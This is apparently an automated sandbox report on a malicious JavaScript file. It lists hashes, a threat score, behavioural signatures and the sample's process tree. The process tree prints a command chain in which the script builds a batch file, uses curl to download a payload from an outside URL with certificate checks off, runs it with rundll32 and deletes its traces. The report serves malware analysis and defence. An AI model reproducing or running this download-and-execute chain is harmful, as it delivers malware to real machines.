Resubmissions

15-11-2023 19:31

231115-x8j9gadf56 10

06-11-2023 04:22

231106-ezdffsgh41 10

Analysis

  • max time kernel
    121s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    15-11-2023 19:31

General

  • Target

    2da0b937-aa51-3ea7-a191-69aa951fe75b.js

  • Size

    54KB

  • MD5

    e11d27dad9d6a484061fed8406b1b4ba

  • SHA1

    7a97b146c0ecac61b41a267b45c66fb9ae9e26cd

  • SHA256

    bef13d6455aa5e949c2952d609fd09e34e53b7ead3b3d84c3018e489fb1f027f

  • SHA512

    d0c0db630c0dc813898989cb437d2922e5a53c14792a3487ce560bace02ea6ea50af669e134850a2ec5ef1f3fce08a716a01f166f7b467b39ec042c38c00e1c5

  • SSDEEP

    768:eO9Gvm/iZquBaXkiEhLGgwHi+7GobjM2Eg60cvmqr:eO9GddwHi+7xjVEvZvmI

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2da0b937-aa51-3ea7-a191-69aa951fe75b.js"
      2⤵
      • Deletes itself
      PID:2080
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo|set /p="cu" > "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2108
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="cu" 1>"C:\Users\Admin\AppData\Local\Temp\cumque.q.bat""
        3⤵
          PID:2660
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo"
          3⤵
            PID:2632
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c echo rl "https://saogoncalomedicina.com.br/TOP/4129/320ca3f6/?cable=198832.219" --output "C:\Users\Admin\AppData\Local\Temp\\vero.q" --ssl-no-revoke --insecure --location >> "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
          2⤵
            PID:2768
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
            2⤵
              PID:2812
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\cumque.q.bat"
              2⤵
                PID:2044
              • C:\Windows\System32\rundll32.exe
                "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\\vero.q" scab /k redit739
                2⤵
                  PID:1264

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\cumque.q.bat

                Filesize

                170B

                MD5

                1198fa4486b382bc05b322fe52655020

                SHA1

                2d72bab9a1d3fdb868a55c169cd4b30a650f6f84

                SHA256

                4d7c7e32ed6a3bd24f3e2e32b2ace831349c0caace4e7c1d3fd6d065f269b8bc

                SHA512

                a30e51cf8ae6a6b62717d5f7ed1d0bdd32eefd3c4780a5a2d1ec7322885304c200aa1b5f8e1eedd5e7b0fa0ace384fb1452cb9c9c58bde92833772e88baa5d9f

              • C:\Users\Admin\AppData\Local\Temp\cumque.q.bat

                Filesize

                170B

                MD5

                1198fa4486b382bc05b322fe52655020

                SHA1

                2d72bab9a1d3fdb868a55c169cd4b30a650f6f84

                SHA256

                4d7c7e32ed6a3bd24f3e2e32b2ace831349c0caace4e7c1d3fd6d065f269b8bc

                SHA512

                a30e51cf8ae6a6b62717d5f7ed1d0bdd32eefd3c4780a5a2d1ec7322885304c200aa1b5f8e1eedd5e7b0fa0ace384fb1452cb9c9c58bde92833772e88baa5d9f